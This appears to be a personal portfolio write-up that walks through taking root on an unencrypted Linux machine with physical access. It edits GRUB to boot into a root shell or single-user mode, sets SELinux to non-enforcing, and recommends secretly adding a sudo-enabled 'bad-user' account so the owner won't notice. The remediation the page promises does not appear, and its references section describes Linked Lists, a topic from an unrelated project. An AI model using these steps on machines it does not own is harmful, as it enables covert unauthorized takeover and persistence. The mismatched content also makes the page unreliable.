To explore the various methods of breaking into any Linux system that doesn't use FDE (Full Disk Encryption) through physical access. Also, to examine the procedure of FDE setup and other remediations to prevent this.

• Physical access to the target machine
• ~60 seconds

1. Power on/reboot the target machine
   1. Through a graphical login screen: for a clean reboot just use the shutdown/reboot options in the system menu.
   2. Through a Textual User Interface: switch to a text console with <Ctrl>-<Alt>-<Del>.
   3. If all else fails, press the Reset button or power cycle the target machine.
2. Press/hold the <Escape> key as soon as you see the GRUB splash screen.
3. At the grub prompt, press 'e' to edit
4. While still inside grub, add “init=/bin/bash” to the end of the “kernel” line:

   kernel=/vmlinuz-<version> [...parameters...] init=/bin/bash

5. Continue booting.

DONE! THAT'S ALL FOLKS! After the target machine finishes booting, the kernel will detect the hardware and immediately drop you into a root shell. Since the system initialization script '/etc/rc.d/rc.sysinit' was bypassed and NOT executed, we need to remount the root file system and make some changes to make the system more usable.:

1. Mount the /proc file system:

   # mount /proc

   You will see an error message complaining that it was already mounted. Ignore it.

2. Remount the root file system in read-write mode:

   mount -o remount,rw /

3. Depending on how the target's file system is laid out, you may need to mount some other file systems. Lets view the file system table:

   # cat /etc/fstab

   Mount any other needed file systems (Like '/home', '/usr', etc.).

4. Do whatever nefarious things you want:
   1. Change the root account password:

      passwd root

   2. PROTIP: I don't recommend doing this as the next time the real user logs into the system they will notice that their root password has been changed. We need to be super sneaky, secretive, and surreptitious so here's something a little less noticeable:
      1. Simply add another user without modifying the original root password:

         adduser -D -u 1000 bad-user
         passwd bad-user

      2. Also add the newly created user to the sudoers file. This is also not as noticable as changing the actual root password:

         visudo
         bad-user ALL=(ALL) ALL

5. Reboot the target machine to make the changes persistent. First run 'sync' a few times to tell the kernel to flush any disk I/O out to the hardware and then 'umount' the mounted file systems in reverse order.
6. Once the file systems are all unmounted, you can reboot with either <Ctrl><Alt><Del> or the power switch.

1. Power on/reboot the target machine
   1. Through a graphical login screen: for a clean reboot just use the shutdown/reboot options in the system menu.
   2. Through a Textual User Interface: switch to a text console with <Ctrl>-<Alt>-<Del>.
   3. If all else fails, press the Reset button or power cycle the target machine.
2. Press/hold the <Escape> key as soon as you see the GRUB splash screen.
3. At the grub prompt, press 'a' to modify the kernel parameters.
4. Add a space and the letter 'S' (lower or upper case) to the end of the kernel parameters line:

   kernel=/vmlinuz-version ro root=LABEL=/ [...other-parameters...] S

   1. Sometimes there may still be some mysterious failures in single-user mode, because of Security-Enhanced Linux policy enforcement. In that case, add another boot parameter before the 'S':

      enforcing=0

5. Now press <Enter> to boot with the newly added parameter.

In performing this project, the following resources were referenced:

• Google: Of course Google was used, it knows everything. No particular page from Google was used, It was mainly used for information about the project (Linked Lists in general): http://www.google.com/; If ya don't know, now ya know, and knowing is half the battle.

• Wikipedia: Has a great article on Linked Lists; Tons of information, pretty pictures, and some code: http://en.wikipedia.org/wiki/Linked_list.

Back to my Portfolio